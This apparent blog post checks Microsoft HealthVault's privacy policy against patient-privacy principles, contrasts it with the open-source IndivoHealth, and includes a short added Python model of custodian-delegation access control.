“Corporate claims to offer privacy mean nothing unless they are willing to take the same steps Microsoft has taken in building HealthVault,” says Peel. Microsoft has committed to independent third party audits to verify their pledge to protect privacy. “Audits are essential,” says Peel. “Technology companies have got to do better than telling consumers to just ‘trust us.’ Consumers shouldn’t trust anyone but themselves to decide who can see and use their sensitive health information.”

Microsoft’s HealthVault Privacy Policy does not have the word “audit” in it anywhere. Apparently Dr. Peel assumes that Microsoft telling her that they will get audits is sufficient to ensure that they will. Interestingly the only place that the Microsoft HealthVault press release mentions audits are when they are quoting Peel.

Apparently, this means “trust the auditors”. Of course we all know how well audits serve to protect the public from unethical corporate behavior. The alternative, which is obviously not being discussed, is the ability to inspect the code for yourself. A top GPL licensed PHR is IndivoHealth. Let’s do a quick comparison.

Question: PHR Covered by HIPAA?

IndivoHealth: When it is used by a covered entity, yes.

HealthVault: No. Microsoft is not a covered entity.

Question: How is this verifiable? How can you trust that the user really has control? How can you trust that there is no proprietary back door built into the software?

IndivoHealth: Read the IndivoHealth source code yourself. Hire an auditor of your choice to review the sourcecode. Verify that the auditor you hired is telling you the truth by hiring another auditor, again of your choice. Verify that both auditors you chose and hired are not full of… smoke… by reading the source code yourself.

HealthVault: Trust Microsoft. Trust the auditor that Microsoft pays millions of dollars a year to whistle blow on Microsoft.

I think you get the idea. Nonetheless, Deborah Peel is pretty impressed with HealthVault, from a HealthcareITNews article:

“Their model is that consumers truly should control the information and that’s the direction they want to take as a company,” said Peel. “We really think that because they are the industry leader that the rest of industry will have to follow or be left behind.”

Further:

“Microsoft has agreed to adhere to all of the privacy principles that the coalition developed in 2007, ” Peel said. “Not only adhere to them in terms of contracts but to be audited on these principles. We think they’re setting a new amazingly high bar and frankly, we think what they’re doing is really the best practice that the entire industry needs to follow.”

Well, this is good! Microsoft has agreed to follow the privacy principles! Principles are good. What are the principles? We find the principles at the Patient Privacy Rights website; let’s go through them one at a time.

  • Recognize that patients have the right to medical privacy* (later defined as: Health information privacy is an individual’s right to control the acquisition, uses, or disclosures of his or her identifiable health data.)

Microsoft’s privacy policy: “Microsoft is committed to protecting your privacy.” I guess that settles that.

  • Recognize that user interfaces must be accessible so that health consumers with disabilities can individually manage their health records to ensure their medical privacy

Actually, Microsoft deserves credit for generally working hard in this area. Give credit where it is due. However, no commitment is made in the privacy document regarding accessibility.

  • The right to medical privacy applies to all health information regardless of the source, the form it is in, or who handles it

Microsoft’s privacy policy: “This privacy statement applies to the data collected by Microsoft through the Microsoft HealthVault beta version (the “Service”); it does not apply to data collected through other online or offline Microsoft sites, products, or services.” So much for “no matter what the source”. Microsoft’s HealthVault privacy policy contradicts this Privacy Principle.

  • Give patients the right to opt-in and opt-out of electronic system

Microsoft’s policy indicates that users can quit the system and Microsoft will then delete the data after 90 days. So much for seven generations of custodianship but I guess deleting meets the “opt-out” requirement.

  • Give patients the right to segment sensitive information

No commitment of segmenting information in the privacy statement.

  • Give patients control over who can access their electronic health records

HealthVault says that users can appoint “custodians” of your record. Those custodians can then pass this custodian privilege on to others. Ultimately a HealthVault record can easily get out of the control of the original owner. That is not to say that this is not a cool feature, but it does not work with the principles. From the HealthVault privacy policy: “Because inappropriate granting of access could allow a grantee to violate your privacy or even revoke your access to your own records, we urge you to consider all the consequences carefully before you grant access to your records.” Microsoft’s HealthVault privacy policy contradicts this Privacy Principle.
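To make the access-control point above concrete, here is an added example (not HealthVault's code, and not a description of how HealthVault is actually built) that models the two delegation policies: a transferable one, where any custodian can appoint further custodians and revoke anyone including the owner, as the quoted policy warns is possible, and a hardened one where only the owner can delegate, grants do not chain, and the owner's own access is irrevocable. The `Record` class and the names `patient`, `custodian_a` and `custodian_b` are constructed for the example.

```python
class DelegationError(PermissionError):
    """Raised when an actor attempts a grant or revocation the policy forbids."""


class Record:
    """Minimal access-control model for one PHR record (hypothetical, for illustration).

    transferable=True  : any custodian may appoint custodians and revoke anyone.
    transferable=False : only the owner may appoint or revoke custodians,
                         and the owner can never be revoked.
    """

    def __init__(self, owner: str, transferable: bool):
        self.owner = owner
        self.transferable = transferable
        self.custodians = {owner}  # everyone who may read the record

    def can_access(self, who: str) -> bool:
        return who in self.custodians

    def grant(self, actor: str, grantee: str) -> None:
        if actor not in self.custodians:
            raise DelegationError(f"{actor} has no access to delegate")
        if not self.transferable and actor != self.owner:
            raise DelegationError(f"only the owner may appoint custodians, not {actor}")
        self.custodians.add(grantee)

    def revoke(self, actor: str, target: str) -> None:
        if actor not in self.custodians:
            raise DelegationError(f"{actor} has no access to revoke with")
        if not self.transferable and (actor != self.owner or target == self.owner):
            raise DelegationError(f"{actor} may not revoke {target} under this policy")
        self.custodians.discard(target)


def owner_locked_out(transferable: bool) -> bool:
    """Walk the chain the post describes: owner -> A -> B, then B revokes the owner.

    Returns True if the original owner ends up without access to their own record.
    """
    rec = Record("patient", transferable)
    rec.grant("patient", "custodian_a")
    try:
        rec.grant("custodian_a", "custodian_b")   # re-delegation
        rec.revoke("custodian_b", "patient")      # grantee turns on the owner
    except DelegationError:
        pass                                      # hardened policy stops the chain
    return not rec.can_access("patient")


if __name__ == "__main__":
    print("transferable policy, owner locked out:", owner_locked_out(True))
    print("hardened policy, owner locked out:   ", owner_locked_out(False))
```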

  • Health information disclosed for one purpose may not be used for another purpose before informed consent has been obtained

You can give your health information to “Programs” offered by third party companies. But how will that data be used? From the HealthVault privacy policy: “Please refer to the privacy statements of those Programs for information about their privacy policies, and about how your information will be used by those Programs.” Microsoft’s HealthVault privacy policy contradicts this Privacy Principle.

  • Require audit trails of every disclosure of patient information

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

  • Require that patients be notified promptly of suspected or actual privacy breaches

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

  • Ensure that consumers can not be compelled to share health information to obtain employment, insurance, credit, or admission to schools, unless required by statute

Whose statutes? If my record is in China, does that government have the right to get to it? Microsoft explicitly states: “Personal information collected on the Service may be stored and processed in the United States or any other country in which Microsoft or its affiliates, subsidiaries, or agents maintain facilities, and by using the Service, you consent to any such transfer of information outside of the U.S.” Given that a US record stored in an offshore site can be compelled by a foreign government, Microsoft’s HealthVault privacy policy contradicts this Privacy Principle.

  • Deny employers access to employees’ medical records before informed consent has been obtained

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

  • Preserve stronger privacy protections in state laws

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

  • No secret health databases. Consumers need a clean slate. Require all existing holders of health information to disclose if they hold a patient’s health information

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

  • Provide meaningful penalties and enforcement mechanisms for privacy violations detected by patients, advocates, and government regulators

Perhaps Microsoft will do this… Microsoft makes no commitment in the privacy policy.

In short, Microsoft’s commitment to follow the policy is a commitment that they have NOT made in their policy. Microsoft is basically saying “Trust us, this is secure and private”. Everything about Microsoft’s history indicates that commitments to privacy and security are bogus. What exactly made Dr. Peel conclude they are the market leader in Health Record security and privacy? What made her conclude that Microsoft has “committed” to third party audits?

Perhaps Dr. Peel is discussing a subject as though she were an expert, when in fact she has had little relevant training on the subject.